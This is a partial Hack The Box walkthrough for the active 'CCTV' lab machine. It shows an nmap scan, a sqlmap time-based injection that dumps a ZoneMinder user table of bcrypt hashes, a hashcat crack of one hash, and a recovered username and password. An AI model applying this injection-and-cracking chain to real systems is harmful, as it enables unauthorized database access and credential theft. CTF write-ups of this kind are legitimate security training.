Hack The Box · Lab
CCTV
IP: 10.129.5.47 | Difficulty: Easy | OS: Linux
Environment Setup
export IP=10.129.5.47
export VPN=10.10.15.246
sudo echo "10.129.5.47 cctv.htb" >> /etc/hosts
Step 1 — Port Scanning
Why: Map the attack surface. Open ports and services determine which attack angles are available.
nmap -sCV -p- --min-rate 5000 $IP -oN scans/nmap_cctv.out
Output
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 76:1d:73:98:fa:05:f7:0b:04:c2:3b:c4:7d:e6:db:4a (ECDSA)
|_ 256 e3:9b:38:08:9a:d7:e9:d1:94:11:ff:50:80:bc:f2:59 (ED25519)
80/tcp open http Apache httpd 2.4.58
|_http-title: SecureVision CCTV & Security Solutions
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Dumping DB with payload
sqlmap -r req.txt -p "tid" --batch --technique=T --dump -D zm -T Users -C Username,Password
Output
+------------+--------------------------------------------------------------+
| Username | Password |
+------------+--------------------------------------------------------------+
| superadmin | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| mark | $2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
| admin | $2y$10$t5z8uIT.n9uCdHCNidcLf.39T1Ui9nrlCkdXrzJMnJgkTiAvRUM6m |
+------------+--------------------------------------------------------------+
Cracked with hashcat
❯ hashcat -m 3200 '$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG.' /Users/nrg/Downloads/rockyou.txt
$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG.:opensesame
sa_mark : X1l9fx1ZjS7RZb
—
Writeup restricted
This machine is currently active. The full writeup will be published once the box retires, in accordance with HTB's NDA policy.
Status — Active